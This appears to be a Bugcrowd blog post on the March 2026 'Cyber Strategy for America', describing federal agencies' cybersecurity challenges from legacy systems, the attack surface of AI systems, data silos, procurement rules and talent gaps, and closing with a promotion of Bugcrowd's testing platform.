The U.S. government faces a widening cybersecurity gap as AI accelerates the pace of attacks — and the Trump administration’s new Cyber Strategy for America charts an ambitious path forward. Here’s what you need to know:
Security has always been about prioritizing risk; no matter how well-resourced, no team can identify and fix all vulnerabilities. With the rise of powerful new models like Anthropic’s limited-release Claude Mythos, the window between discovery and exploitation is narrowing. Recent research suggests that the consequences of AI might be even heavier than imagined—even cheap, open-weight models can give attackers an edge.
For governments, this introduces a prioritization challenge. Their systems are high-value targets for attackers and nation-state-sponsored threat actors; any compromise carries national security implications. However, they also operate with far fewer resources than their private-sector counterparts, making them more exposed to these threats. The Trump administration recognizes these challenges and, in March 2026, released the Cyber Strategy for America to push the government toward preemptive security.
In this post, we’ll take a closer look at this strategy and the challenges that stand in the way of its execution.
The Cyber Strategy for America outlines six pillars for strengthening America’s cybersecurity posture:
Executing on these pillars requires agencies to simultaneously close existing gaps while adopting and deploying new AI technologies—a process that necessitates solving several compounding problems at once.
Federal agencies often rely exclusively on decades-old systems, which pose significant vulnerability risks. Nearly half of known exploited vulnerabilities are tied to outdated, unsupported software that doesn’t receive regular security updates. Modernization is underway at many agencies, but progress is slow: procurement cycles are long, and the talent needed to execute them is scarce. In a recent survey, 44% of agency leaders said that gaps in skilled labor were a key barrier to making progress in their department’s modernization efforts.
The result is a pace mismatch: agencies measure modernization progress in years, whereas threat actors move much more quickly. As a result, agencies running legacy infrastructure are disproportionately exposed.
As agencies adopt AI tools and deploy AI systems, they’re also introducing a new attack surface that needs to be secured. In modern AI systems, the foundational model is just one part of the equation—it’s usually integrated into a broader system that includes tools, memory, retrieval, and external APIs. Every one of those connections is a potential vector: prompts can be injected, tool calls can be manipulated, training data can be poisoned, and memory can be exploited to compromise or manipulate a system. Additionally, if these systems are built on third-party models or infrastructure, this introduces attack surfaces that agencies don’t have full visibility or control over.
To protect against this threat, agencies need to defend all parts of their AI stack using guardrail models, structured tool schemas, output verifiers, and other defensive mechanisms. Implementing this approach requires a mix of human talent and other specialized AI tools. Given the resource shortages, lack of technical expertise, lengthy procurement cycles, and competing requirements, many agencies don’t have the bandwidth to properly secure these systems. For risk-averse agencies, this can slow adoption, whereas for others, this can introduce security loopholes that threat actors can exploit.
Federal agencies have access to a treasure trove of data but lack the right systems and governance to fully leverage it and deploy effective AI systems.
AI systems are only as good as the data they’re trained on, and many agencies can’t confirm the accuracy, consistency, or completeness of their data. Flawed inputs produce unreliable outputs, which compromise any AI-powered defense tool before it’s even deployed.
Additionally, even if the data is high quality, it’s spread across different environments (e.g., on-premise, cloud, and hybrid). Effective threat detection increasingly requires correlating signals across agencies, but these siloed systems make it difficult to assemble a complete picture. Ongoing resource shortages and budget constraints exacerbate these limitations. A recent report found that federal agencies are struggling to deliver high-quality datasets due to limited resources and consistency challenges.
Federal procurement and regulatory frameworks were designed for stability, not the rapid pace of AI deployment. For instance, the Federal Acquisition Regulation (FAR), which governs how agencies procure new software tools and other goods and services, features extensive rules that can slow the adoption of new tools. This further hinders agencies’ ability to iterate on their AI stack.
Even when agencies have access to the right tools, ensuring usage requires leadership buy-in and trained talent, which many agencies (especially small ones) lack. According to Brookings, only a small fraction of technical talent in the federal workforce has relevant AI skills, and limited current job listings mention AI skills as a key requirement. When agencies lack the internal expertise to evaluate and confidently deploy new technology, the default is to move slowly, causing them to fall further behind. Ultimately, this leaves them open for exploitation by threat actors.
As the pace of exploitation increases, the Cyber Strategy for America provides a blueprint for securing the public sector. However, executing on this vision requires agencies to act now—mobilizing the right tools, talent, and processes—before the window narrows further.
That’s where Bugcrowd comes in. With our recent FedRAMP Moderate Authorization, federal agencies can now engage Bugcrowd’s offensive security testing platform to continuously identify and proactively remediate their most critical vulnerabilities without long procurement delays. In part 2 of this blog series, we’ll dive into how the Bugcrowd Platform works in practice for federal agencies and the public sector as a whole. In the meantime, you can learn more about Bugcrowd’s government solutions in this brief.